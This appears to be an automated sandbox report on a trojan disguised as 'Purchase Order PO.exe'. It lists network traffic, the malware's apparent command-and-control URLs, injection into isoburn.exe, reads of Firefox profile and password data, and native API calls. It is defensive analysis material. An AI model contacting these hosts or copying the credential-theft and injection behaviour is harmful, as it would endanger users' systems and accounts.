                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 22 Nov 2024 14:14:29 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 22 Nov 2024 14:14:31 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Fri, 22 Nov 2024 14:14:38 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Fri, 22 Nov 2024 14:14:41 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Fri, 22 Nov 2024 14:14:44 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.25.3 | Date: Fri, 22 Nov 2024 14:14:46 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 203 | Connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Fri, 22 Nov 2024 14:14:54 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Fri, 22 Nov 2024 14:14:57 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Fri, 22 Nov 2024 14:14:59 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | date: Fri, 22 Nov 2024 14:15:02 GMT | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: QfgdvbjddZ.exe, 00000008.00000002.4170545877.0000000003948000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFd
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: QfgdvbjddZ.exe, 00000008.00000002.4172302652.00000000056E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net
                Source: QfgdvbjddZ.exe, 00000008.00000002.4172302652.00000000056E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.smartcongress.net/qtfx/
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Purchase Order PO.exe, 00000000.00000002.1744861473.0000000006E52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Purchase Order PO.exeString found in binary or memory: https://github.com/ppx17/Onkyo-Remote-Control
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000007.00000002.4169460570.0000000003049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000007.00000003.2318577280.0000000008146000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: isoburn.exe, 00000007.00000002.4171236393.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170545877.00000000037B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cstrategy.online/qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: isoburn.exe, 00000007.00000003.2328333477.0000000008158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: Purchase Order PO.exe
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_0042C663 NtClose,2_2_0042C663
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2B60 NtClose,LdrInitializeThunk,2_2_01AD2B60
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01AD2DF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01AD2C70
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD35C0 NtCreateMutant,LdrInitializeThunk,2_2_01AD35C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD4340 NtSetContextThread,2_2_01AD4340
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD4650 NtSuspendThread,2_2_01AD4650
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BA0 NtEnumerateValueKey,2_2_01AD2BA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2B80 NtQueryInformationFile,2_2_01AD2B80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BE0 NtQueryValueKey,2_2_01AD2BE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2BF0 NtAllocateVirtualMemory,2_2_01AD2BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AB0 NtWaitForSingleObject,2_2_01AD2AB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AF0 NtWriteFile,2_2_01AD2AF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2AD0 NtReadFile,2_2_01AD2AD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DB0 NtEnumerateKey,2_2_01AD2DB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2DD0 NtDelayExecution,2_2_01AD2DD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D30 NtUnmapViewOfSection,2_2_01AD2D30
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D00 NtSetInformationFile,2_2_01AD2D00
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2D10 NtMapViewOfSection,2_2_01AD2D10
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2CA0 NtQueryInformationToken,2_2_01AD2CA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2CF0 NtOpenProcess,2_2_01AD2CF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2CC0 NtQueryVirtualMemory,2_2_01AD2CC0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2C00 NtQueryInformationProcess,2_2_01AD2C00
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2C60 NtCreateKey,2_2_01AD2C60
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2FA0 NtQuerySection,2_2_01AD2FA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2FB0 NtResumeThread,2_2_01AD2FB0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2F90 NtProtectVirtualMemory,2_2_01AD2F90
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2FE0 NtCreateFile,2_2_01AD2FE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2F30 NtCreateSection,2_2_01AD2F30
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2F60 NtCreateProcessEx,2_2_01AD2F60
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2EA0 NtAdjustPrivilegesToken,2_2_01AD2EA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2E80 NtReadVirtualMemory,2_2_01AD2E80
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2EE0 NtQueueApcThread,2_2_01AD2EE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD2E30 NtWriteVirtualMemory,2_2_01AD2E30
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD3090 NtSetValueKey,2_2_01AD3090
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD3010 NtOpenDirectoryObject,2_2_01AD3010
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD39B0 NtGetContextThread,2_2_01AD39B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD3D10 NtOpenProcessToken,2_2_01AD3D10
                Source: C:\Users\user\Desktop\Purchase Order PO.exe, Code function: 2_2_01AD3D70 NtOpenThread,2_2_01AD3D70
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05044650 NtSuspendThread,LdrInitializeThunk,7_2_05044650
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05044340 NtSetContextThread,LdrInitializeThunk,7_2_05044340
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042D10 NtMapViewOfSection,LdrInitializeThunk,7_2_05042D10
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_05042D30
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042DD0 NtDelayExecution,LdrInitializeThunk,7_2_05042DD0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_05042DF0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042C60 NtCreateKey,LdrInitializeThunk,7_2_05042C60
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_05042C70
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_05042CA0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042F30 NtCreateSection,LdrInitializeThunk,7_2_05042F30
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042FB0 NtResumeThread,LdrInitializeThunk,7_2_05042FB0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042FE0 NtCreateFile,LdrInitializeThunk,7_2_05042FE0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_05042E80
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042EE0 NtQueueApcThread,LdrInitializeThunk,7_2_05042EE0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042B60 NtClose,LdrInitializeThunk,7_2_05042B60
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_05042BA0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042BE0 NtQueryValueKey,LdrInitializeThunk,7_2_05042BE0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_05042BF0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042AD0 NtReadFile,LdrInitializeThunk,7_2_05042AD0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042AF0 NtWriteFile,LdrInitializeThunk,7_2_05042AF0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_050435C0 NtCreateMutant,LdrInitializeThunk,7_2_050435C0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_050439B0 NtGetContextThread,LdrInitializeThunk,7_2_050439B0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042D00 NtSetInformationFile,7_2_05042D00
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042DB0 NtEnumerateKey,7_2_05042DB0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042C00 NtQueryInformationProcess,7_2_05042C00
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042CC0 NtQueryVirtualMemory,7_2_05042CC0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042CF0 NtOpenProcess,7_2_05042CF0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042F60 NtCreateProcessEx,7_2_05042F60
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042F90 NtProtectVirtualMemory,7_2_05042F90
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042FA0 NtQuerySection,7_2_05042FA0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042E30 NtWriteVirtualMemory,7_2_05042E30
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042EA0 NtAdjustPrivilegesToken,7_2_05042EA0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042B80 NtQueryInformationFile,7_2_05042B80
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05042AB0 NtWaitForSingleObject,7_2_05042AB0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05043010 NtOpenDirectoryObject,7_2_05043010
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05043090 NtSetValueKey,7_2_05043090
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05043D10 NtOpenProcessToken,7_2_05043D10
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_05043D70 NtOpenThread,7_2_05043D70
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_02D39210 NtReadFile,7_2_02D39210
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_02D393A0 NtClose,7_2_02D393A0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_02D39300 NtDeleteFile,7_2_02D39300
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_02D390A0 NtCreateFile,7_2_02D390A0
                Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 7_2_02D39510 NtAllocateVirtualMemory,7_2_02D39510
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01B1F290 appears 103 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01A8B970 appears 257 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01AE7E54 appears 99 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01B0EA12 appears 86 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01AD5130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05057E54 appears 107 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0508F290 appears 103 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0507EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04FFB970 appears 262 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05045130 appears 58 times
                Source: Purchase Order PO.exe, 00000000.00000002.1740596603.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1744164572.0000000005460000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1746019565.0000000007910000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1741702532.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001B8D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameISOBURN.EXEj% vs Purchase Order PO.exe
                Source: Purchase Order PO.exe Binary or memory string: OriginalFilenameJIjm.exeB vs Purchase Order PO.exe
                Source: Purchase Order PO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order PO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, RNTHW2S4uo86L5o1JA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, RNTHW2S4uo86L5o1JA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
                Source: C:\Users\user\Desktop\Purchase Order PO.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order PO.exe.log
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user\AppData\Local\Temp\l420377x
                Source: Purchase Order PO.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: isoburn.exe, 00000007.00000003.2323336714.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2328435938.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2322436960.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4169460570.00000000030A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Purchase Order PO.exe ReversingLabs: Detection: 65%
                Source: Purchase Order PO.exe String found in binary or memory: 0 All OKS1 Not all required parameters are given-2 Invalid IP-Address
